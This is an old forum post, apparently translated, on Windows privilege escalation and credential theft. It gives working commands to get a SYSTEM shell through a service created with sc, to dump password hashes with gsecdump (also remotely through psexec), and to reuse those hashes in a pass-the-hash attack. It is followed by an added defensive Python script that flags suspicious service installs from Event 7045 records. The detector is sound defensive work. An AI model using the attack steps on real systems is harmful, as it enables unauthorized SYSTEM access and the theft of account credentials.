Hash injection attack

Posted on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
A tip: you can use iam from the pshtools toolkit to import the hash information just captured with gsecdump into the local lsass process and carry out a hash injection attack. The foreigners really are good at this; admins are going to be busy now. With the LM/NT hashes obtained during ARP spoofing, or those obtained with gethash, there is actually no need to crack the password at all; it is just a matter of using the tool. As the original article puts it nicely, no matter whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
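The `sc create ... cmd.exe` step quoted above leaves a Service Control Manager record in the System log (Event ID 7045, "A service was installed in the system"), which is what a defender can watch for. The following Python is an added example, not part of the original post or the quoted blog: it parses constructed 7045 records and flags services whose binary is a command interpreter or a known credential-dump tool. The sample log text, the service names and the watchlist are constructed assumptions.

```python
import re
# Constructed sample records shaped like the text body of Windows System log
# Event ID 7045 ("A service was installed in the system"); not real log data.
SAMPLE_EVENTS = """\
Event 7045, Service Control Manager
Service Name: shellcmdline
Service File Name: C:\\WINDOWS\\system32\\cmd.exe /K start

Event 7045, Service Control Manager
Service Name: Print Spooler
Service File Name: C:\\WINDOWS\\system32\\spoolsv.exe

Event 7045, Service Control Manager
Service Name: gsecdumpsvc
Service File Name: "C:\\Program Files\\tools\\gsecdump.exe" -u
"""

# A command interpreter is never a legitimate service binary (the SYSTEM-prompt trick above).
INTERPRETERS = {"cmd.exe", "command.com", "powershell.exe"}
# Constructed watchlist of credential-dumping tool names mentioned in the post.
WATCHLIST = {"gsecdump.exe"}

def parse_7045(text):
    """Split the log text into one dict of 'Field: value' pairs per record."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines()[1:]:  # line 0 is the event header
            key, _, value = line.partition(":")
            fields[key.strip()] = value.strip()
        records.append(fields)
    return records

def image_basename(file_name):
    """Executable name from a service image path, honouring a quoted path."""
    s = file_name.strip()
    exe = s[1:].split('"', 1)[0] if s.startswith('"') else s.split(" ", 1)[0]
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def find_suspicious_services(text):
    """Return (service name, reason) for each installed service to review."""
    findings = []
    for rec in parse_7045(text):
        exe = image_basename(rec.get("Service File Name", ""))
        if exe in INTERPRETERS:
            findings.append((rec["Service Name"], "binary is a command interpreter"))
        elif exe in WATCHLIST:
            findings.append((rec["Service Name"], "binary is on the dump-tool watchlist"))
    return findings
```

Unquoted image paths containing spaces are cut at the first space, so extend `image_basename` if your environment registers such paths.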